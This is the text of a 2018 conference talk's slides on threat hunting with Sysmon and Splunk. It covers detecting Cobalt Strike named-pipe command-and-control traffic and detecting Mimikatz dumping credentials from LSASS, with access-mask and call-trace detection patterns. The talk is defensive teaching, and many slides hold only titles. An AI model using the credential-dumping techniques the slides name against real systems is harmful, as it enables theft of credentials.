SLIDE 102

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 102

Cobalt Strike Features

SMB traffic between WS Only one egress point using HTTP as C&C Conn thru web proxy SMB traffic between WS Named Pipes C&C

slide-103
SLIDE 103

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 103

Detecting C2 usingNamed Pipes

 Search for Processes

 Connecting through Web Proxy and  Creating Named Pipes

slide-104
SLIDE 104

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 104

Detecting C2 usingNamed Pipes

slide-105
SLIDE 105

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 105

Detecting C2 usingNamed Pipes

slide-106
SLIDE 106

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 106

Detecting C2 usingNamed Pipes

 Search for Processes creating «known malicious» Named Pipes

 with or without «default PipeNames»

slide-107
SLIDE 107

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 107

Detecting C2 usingNamed Pipes

 Searching for «custom PipeNames» only

slide-108
SLIDE 108

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 108

Detecting C2 usingNamed Pipes

 Searching for «default & custom PipeNames»

slide-109
SLIDE 109

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 109

Detecting C2 usingNamed Pipes

 Searching for «default & custom PipeNames»

slide-110
SLIDE 110

 Detecting ProcessAccess on LSASS.exe  Idea by Mark Russinovich (RSA talk)

Seite 110

Detecting Mimikatz (even file-less)

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-111
SLIDE 111

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 111

Detecting Mimikatz

 Point 1

slide-112
SLIDE 112

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 112

Detecting Mimikatz

 Point 1

slide-113
SLIDE 113

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 113

Detecting Mimikatz

 Point 1

slide-114
SLIDE 114

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 114

Detecting Mimikatz

 Search for ProcessAccess of LSASS.exe

 GrantedAccess of: 0x1010, 0x1410, 0x143A  CallTrace: KERNELBASE.dll and (ntdll.dll or UNKNOWN)  …

slide-115
SLIDE 115

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 115

Detecting Mimikatz

 Mimikatz executable from Github

 File-based  No «UNKNOWN» from shellcode / injection

slide-116
SLIDE 116

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 116

Detecting Mimikatz

 Cobalt Strike Beacon’s built-in Mimikatz «logonpasswords»

 File-less  «UNKNOWN» from shellcode / injection

slide-117
SLIDE 117

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 117

Detecting Mimikatz

 Invoke-Mimikatz using PowerPick from Cobalt Strike’s Beacon

 File-less  «UNKNOWN» from shellcode / injection

slide-118
SLIDE 118

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 118

Detecting Mimikatz

 Don’t search for specific SourceImage names

 e.g. Rundll32.exe -- it could be really anything! (even cmd.exe )

slide-119
SLIDE 119

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 119

Detecting Mimikatz (OpenProcess)

slide-120
SLIDE 120

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 120

Detecting Mimikatz (OpenProcess)

slide-121
SLIDE 121

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 121

Sysmon – what to do now?

NEW

slide-122
SLIDE 122

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 122

Sysmon – what to do now?

NEW

slide-123
SLIDE 123

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 123

Sysmon – what to do now?

NEW

slide-124
SLIDE 124

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 124

Why care about WMI events?

NEW

slide-125
SLIDE 125

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 125

Why care about WMI events?

NEW

slide-126
SLIDE 126

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 126

I have some questions…

 Please stand up…  Sit down if you…

 didn’t learn anything new (resources, examples)  detect internal C&C using Named Pipes over SMB  detect in-memory / file-less Mimikatz on (all of) your hosts

 Bonus: all versions of Mimikatz?

 Everyone sitting now I would like to have a chat 

slide-127
SLIDE 127

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 127

Do you have questions?

 Is there time left for Q&A?

slide-128
SLIDE 128

Thank you for your attention!

Tom Ueltschi, Swiss Post CERT

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 128